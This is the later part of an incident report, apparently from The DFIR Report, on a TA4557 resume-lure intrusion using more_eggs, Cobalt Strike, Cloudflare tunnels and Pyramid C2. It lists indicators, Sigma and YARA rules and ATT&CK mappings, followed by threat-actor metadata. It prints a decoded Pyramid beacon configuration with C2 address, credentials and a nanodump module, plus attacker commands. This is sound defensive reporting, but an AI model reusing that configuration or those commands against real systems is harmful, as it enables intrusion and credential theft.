close\"\r\n\"Accept-Language: en-GB;q=0.9, *;q=0.7\"\r\nDomain shehasgone[.]com\r\nIP 144.208.127[.]15\r\nPort 443\r\nJA3 a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s d32d6a0ff9d52869cb6d4ab402b7306c\r\nJA4 t12d190800_d83cc789557e_16bbda4055b2\r\nJA4s t120300_c02c_52d195ce1d92\r\nThis IP and domain were only seen active during March 2024 and the DFIR Threat Intelligence Group also observed the\r\ndomain associated with the IP 109.104.152.24, although that address was not observed in this intrusion.\r\nCloudFlare Tunnels\r\nCloudFlared tunnels were established on two server hosts by the threat actor. One host showed persistent connections to the\r\nCloudFlare IPv4 range during the intrusion.\r\nWith DNS query requests to the following domains:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 28 of 38\n\nDeploying Pyramid C2\r\nThe threat actor transferred the file python-3.10.4-embed-amd64.zip through the Cobalt Strike beacon. This zip file included\r\na number of files, including an exploit tool for Veeam. This was dropped on the beachhead in the user writable\r\n‘ProgramData’ folder.\r\nThe zip file was masqueraded as a Python-3.10 install package. The attacker attempted to extract the zip file contents file via\r\nPowerShell commandlets, several combinations were attempted, this ultimately failed.\r\nThe threat actor decided to use the Windows provided utility ‘Tar’ instead.\r\nUsing the Tar utility, no target destination was specified by the threat actor. As a result by default the extraction created \u003e200\r\nfiles in the Windows\\System32.\r\nUndeterred, the threat actor used the 7zip command line utility that they downloaded in the ProgramData folder.\r\nc:\\programdata\\ssh\\7za.exe x \"c:\\programdata\\ssh\\python-3.10.4-embed-amd64.zip\" -y\r\nUnfortunately, the threat actor made a similar error, with files (\u003e 200) extracted to the Windows\\SysWOW64 folder location\r\nthis time. This was due to their command session current directory being under C:\\Windows\\System32, with the application\r\nbeing 32-bit (SysWOW64).\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 29 of 38\n\nThe threat actor realized the error and switched to the correct current directory of C:\\ProgramData\\SSH. They used 7za\r\nagain to extract the contents (\u003e 200 files) into the correct location.\r\nA lot of file creation events were observed throughout this process (\u003e700 files), with python files (.py extension) being\r\ncreated in Windows folder locations that could be unusual.\r\nOnce finally uncompressed, the threat actor ran the following python file:\r\ncmd.exe /C \"python.exe cradle.py\"\r\nWhen analyzing the file crade.py and decoding its content, we identified it was a Pyramid beacon with the following\r\nconfiguration:\r\npyramid_server='172.96.139.82'\r\npyramid_port='80'\r\npyramid_user='fLCi6UsgLYKdj7Fi'\r\npyramid_pass='Q6V26bKG68nLJ4T3UXkEFLJYsHvKgLVi'\r\nencryption='chacha20'\r\nencryptionpass='TestPass1'\r\nchacha20IV=b'12345678'\r\npyramid_http='http'\r\nencode_encrypt_url='/login/'\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 30 of 38\n\npyramid_module='base-bof_nanodump.py'\r\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.302\r\nThe IP address used for this C2 framework has been spotted sporadically by the DFIR Threat Intelligence Group with\r\nactivity in March, July, and September of 2024.\r\nTimeline\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 31 of 38\n\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 32 of 38\n\nDiamond Model\r\nIndicators\r\nAtomic\r\n# TA4557 Resume Lure\r\njohnshimkus[.]com\r\n# Other Identified TA4557 Resume Lure Pages\r\nannetterawlings[.]com\r\nmitchellspearman[.]com\r\nmikedecook[.]com\r\ndavidopkins[.]com\r\nmarkqualman[.]com\r\njulienolsson[.]com\r\nwlynch[.]com\r\njohncboins[.]com\r\nchristianvelour[.]com\r\nlisasierra[.]com\r\nmikedecook[.]com\r\njacksallay[.]com\r\n# more_eggs\r\npin.howasit[.]com\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 33 of 38\n\n108.174.197[.]15\r\n# Cobalt Strike\r\nshehasgone[.]com\r\n144.208.127[.]15\r\n# Pyramind\r\n172.96.139[.]82\r\n# Computer Name\r\nkali\r\nPACKERP-VUDV41R\r\nComputed\r\nName: John Shimkus.zip\r\nSize: 17421 bytes (17 KiB)\r\nSHA256: ffc89a2026fa2b2364dd180ede662fa4ac161323388f3553b6d6e4cb2601cb1f\r\nName: John-_Shimkus.lnk\r\nSize: 5977 bytes (5.84 kB)\r\nSAH256: b56d2e095dc6c2171e461ca737cbdc0a35de7f4729b31fe41258f9cbd81309a1\r\nName: 31765.ocx\r\nSize: 236544 bytes (231 KiB)\r\nSHA256: 408f1f982bef7ab5a79057eec4079e5e8d87a0ee83361c79469018b791c03e8f\r\nName: VeeamHax.exe\r\nSize: 7680 bytes (7 KiB)\r\nSHA256: aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d\r\nName: AdFind.exe\r\nSize: 2195968 bytes (2144 KiB)\r\nSHA256: 4b8be22b23cd9098218a6f744baeb45c51b6fad6a559b01fe92dbb53c6e2c128\r\nName: cloudflared-windows-amd64.exe\r\nSize: 62660475 bytes (59 MiB)\r\nSHA256: 4569c869047a092032f6eac7cf0547591a03a0d750a6b104a606807ea282d608\r\nName: cloudflared-windows-amd64.msi\r\nSize: 18305536 bytes (17 MiB)\r\nSHA256: a26379ad2eb9de44691da254182ca65fb32596fe1217fe4fbddb173f361a0a9b\r\nName: payload_cr1.dll (Cobalt Strike)\r\nSize: 236544 bytes (231 KiB)\r\nSHA256: 408f1f982bef7ab5a79057eec4079e5e8d87a0ee83361c79469018b791c03e8f\r\nName: netscan.exe\r\nSize: 16047672 bytes (15 MiB)\r\nSHA256: a8a7fdbbc688029c0d97bf836da9ece926a85e78986d0e1ebd9b3467b3a72258\r\nAdditional Indicators provided by Proof Point\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 34 of 38\n\nFile Name John__Shimkus.lnk\r\nSHA256 95634a5c6a8290aaa9d287f28c7d22b3b7ca1cf974339fc89ea4d542fa2ec45a\r\nFile Name Resume - John Shimkus.pdf\r\nFile Size 259866 bytes\r\nFile Type PDF document, version 1.7\r\nMD5 987ad23508239b58739279048cb850d5\r\nSHA1 62ea63b720556bda73eaf95be7a282193d19aa4d\r\nSHA256 fe63fdf34d66f1658e2c9227ac84adffaa2cbb8b689999d4d1ebc733fc5f0fce\r\nFile name 5477CA40.txt\r\nAssociated Filenames\r\nC:\\ProgramData\\Microsoft\\5477CA40.txt\r\nFile Size 896 bytes\r\nMD5 14c72c6c628104de0a93df124caa3e4a\r\nSHA1 03bd5fa3fa4b06190b26762c4ea7b4e6ac615819\r\nSHA256 bd3df53a397af4fe5e1441b2c91a6149bac9d26c94e46de9dbcbfa9b8647a935\r\nFile name 2A2052FAA08D525.txt\r\nAssociated Filenames\r\nC:\\ProgramData\\Microsoft\\2A2052FAA08D525.txt\r\nFile Size 1745 bytes\r\nMD5 6a0ddc6b06db8f7fef1e8934347d150d\r\nSHA1 6a8fed99d66e84524fc75c7bfe003dea750dab11\r\nSHA256 29bc115b5ae8cf19578c1c6a6743c3e53b9247d8eb6c556bc9d056994c58835b\r\nFile name 16304.dll\r\nAssociated Filenames\r\nC:\\Users\\User\\AppData\\Roaming\\Microsoft\\16304.dll\r\nFile Size 258560 bytes\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 bace25f5a53a4e6cde31fe2ca2bc39a9\r\nSHA1 ac6521fa3b00f4e70ffb97ee1dfa895097d01dc8\r\nSHA256 757e297137e8ed21622297ae8885740b5beb09bc07141cf8ce7b24dbd95bdaf0\r\nFile name 495D3BB0FEC9.txt\r\nAssociated Filenames\r\nC:\\ProgramData\\Microsoft\\495D3BB0FEC9.txt\r\nFile Size 77881 bytes\r\nMD5 6886f4cce4041cf27dff8e2ecfbfd38d\r\nSHA1 b68eaed2a653ca79b8ef0b261eb4047ced6e16f4\r\nSHA256 6f12dc858631cf90cd4fef57fbb52675b8649d777c7f86384c6535da0a59ad67\r\nFile name 60052.txt\r\nAssociated Filenames\r\nC:\\Windows\\Temp\\60052.txt\r\nC:\\Users\\User\\AppData\\Local\\Temp\\48744.txt\r\nFile Size 80 bytes\r\nMD5 4fdbae9775a20dc33dec05e408c2a2ad\r\nSHA1 3eaa51632f2beae23d9811b9ff91e31c91092177\r\nSHA256 228cd867898ab0b81d31212b2da03cc3e349c9000dfb33e77410e2937cea8532\r\nFile name kbbwi9hgjw\r\nFile Size 357808 bytes\r\nSHA256 cbe1f43ad7a19c97a521a662dd406a3fb345ae919271cefc694a71e55fe163f5\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 35 of 38\n\nDetections\r\nNetwork\r\nETPRO MALWARE Possible More_eggs Connectivity Check M2\r\nET INFO DNS Query to Cloudflare Tunneling Domain (argotunnel .com)\r\nET INFO Observed Cloudflare Tunneling Domain (argotunnel .com in TLS SNI)\r\nET INFO SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nETPRO MALWARE App Whitelist Bypass Via Com Scriptlet Inbound\r\nSigma\r\nDFIR Public Rules Repo:\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\nDFIR Private Rules:\r\n28702b61-c530-49f8-9d22-de15166ab9c5 : Detection of Modified VeeamHax Tool Usage\r\n9b3a37ab-c97a-451b-94e8-09dae5e759e7 : Detecting the use of a workstation named 'kali' in the network\r\n275ec3d1-47c1-4fa9-a001-fa4feeb5e4d4 : Detect Disabling Windows Defender Threat Protection\r\n855a4c48-fdd5-4283-ba4b-c5ec167e4128 : Detection of Suspicious msxsl.exe Command Line Activity\r\n8c2dc958-3385-4ac7-acdb-eeecafa7944e : Detection of Suspicious IPv6 Address in RDP Sessions\r\n3b4e4f8d-50e3-48c8-a92b-fba48d5af7a1 : Execution IE4uinit.exe to Sideload Malicious Binaries\r\nSigma Repo:\r\na7c3d773-caef-227e-a7e7-c2f13c622329 : Bad Opsec Defaults Sacrificial Processes With Improper Arguments\r\n9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 : Cloudflared Tunnel Execution\r\na1d9eec5-33b2-4177-8d24-27fe754d0812 : Cloudflared Tunnels Related DNS Requests\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n5a105d34-05fc-401e-8553-272b45c1522d : CobaltStrike Service Installations - System\r\nbf361876-6620-407a-812f-bfe11e51e924 : Compressed File Extraction Via Tar.EXE\r\n0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys\r\n36e037c4-c228-4866-b6a3-48eb292b9955 : DNS Query Request By Regsvr32.EXE\r\n9c14c9fa-1a63-4a64-8e57-d19280559490 : Invoke-Obfuscation Via Stdin\r\n9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 : Msxsl.EXE Execution\r\nc7e91a02-d771-4a6d-a700-42587e0b1095 : Network Connection Initiated By Regsvr32.EXE\r\ncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca : Potentially Suspicious Child Process Of Regsvr32\r\n6385697e-9f1b-40bd-8817-f4a91f40508e : PowerShell Base64 Encoded Invoke Keyword\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n02d1d718-dd13-41af-989d-ea85c7fab93f : Rare Remote Thread Creation By Uncommon Source Image\r\n9525dc73-0327-438c-8c04-13c0e037e9da : Regsvr32 Execution From Potential Suspicious Location\r\nc3a99af4-35a9-4668-879e-c09aeb4f2bdf : Rundll32 Execution With Uncommon DLL Extension\r\n1775e15e-b61b-4d14-a1a3-80981298085a : Rundll32 Execution Without CommandLine Parameters\r\n8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Suspicious CMD Shell Output Redirect\r\nfff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory\r\ne0b06658-7d1d-4cd3-bf15-03467507ff7c : Suspicious DotNET CLR Usage Log Artifact\r\nfb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64\r\nd95de845-b83c-4a9a-8a6a-4fc802ebf6c0 : Suspicious Group And Account Reconnaissance Activity Using Net.EXE\r\ndd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c : Suspicious Scheduled Task Creation via Masqueraded XML File\r\nb5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 36 of 38\n\n8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly\r\nc30fb093-1109-4dc8-88a8-b30d11c95a5d : Whoami.EXE Execution With Output Option\r\nb28e58e4-2a72-4fae-bdee-0fbe904db642 : Windows Defender Real-time Protection Disabled\r\n3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/27899/27899.yar\r\nExternal Rules:\r\nMITRE ATT\u0026CK\r\nBrowser Information Discovery - T1217\r\nCreate Account - T1136\r\nCredentials from Password Stores - T1555\r\nDisable or Modify Tools - T1562.001\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 37 of 38\n\nDomain Trust Discovery - T1482\r\nExploitation for Privilege Escalation - T1068\r\nFile and Directory Discovery - T1083\r\nFile Deletion - T1070.004\r\nIngress Tool Transfer - T1105\r\nLocal Account - T1087.001\r\nLocal Groups - T1069.001\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nNetwork Service Discovery - T1046\r\nNetwork Share Discovery - T1135\r\nPhishing - T1566\r\nPowerShell - T1059.001\r\nProtocol Tunneling - T1572\r\nProxy - T1090\r\nPython - T1059.006\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nScheduled Task - T1053.005\r\nSecurity Software Discovery - T1518.001\r\nSource: https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 38 of 38\n\n https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/ \nThe same website template and stock image was used in a TA4557 campaign that Proofpoint covered below:\n Page 7 of 38 \n\nindicating the number The pattern generated of samples approximately collected. 20 new process creation events per hour throughout the duration of the intrusion. This\nwas based on the parameter of 180 seconds, 60 minutes (hour) / 3 minutes (180 seconds) = 20 processes.\n Page 12 of 38", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/" ], "report_names": [ "the-curious-case-of-an-egg-cellent-resume" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "7a257844-df90-4bd4-b0f1-77d00ff82802", "created_at": "2022-10-25T16:07:24.376356Z", "updated_at": "2026-04-10T02:00:04.964565Z", "deleted_at": null, "main_name": "Venom Spider", "aliases": [ "Golden Chickens", "TA4557", "Venom Spider" ], "source_name": "ETDA:Venom Spider", "tools": [ "More_eggs", "PureLocker", "SONE", "SpicyOmelette", "StealerOne", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Taurus Loader Reconnaissance Module", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraCrypt", "TerraLogger", "TerraPreter", "TerraRecon", "TerraStealer", "TerraTV", "TerraWiper", "ThreatKit", "VenomKit", "VenomLNK", "lite_more_eggs" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434627, "ts_updated_at": 1775792168, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.pdf", "text": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.txt", "img": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.jpg" } }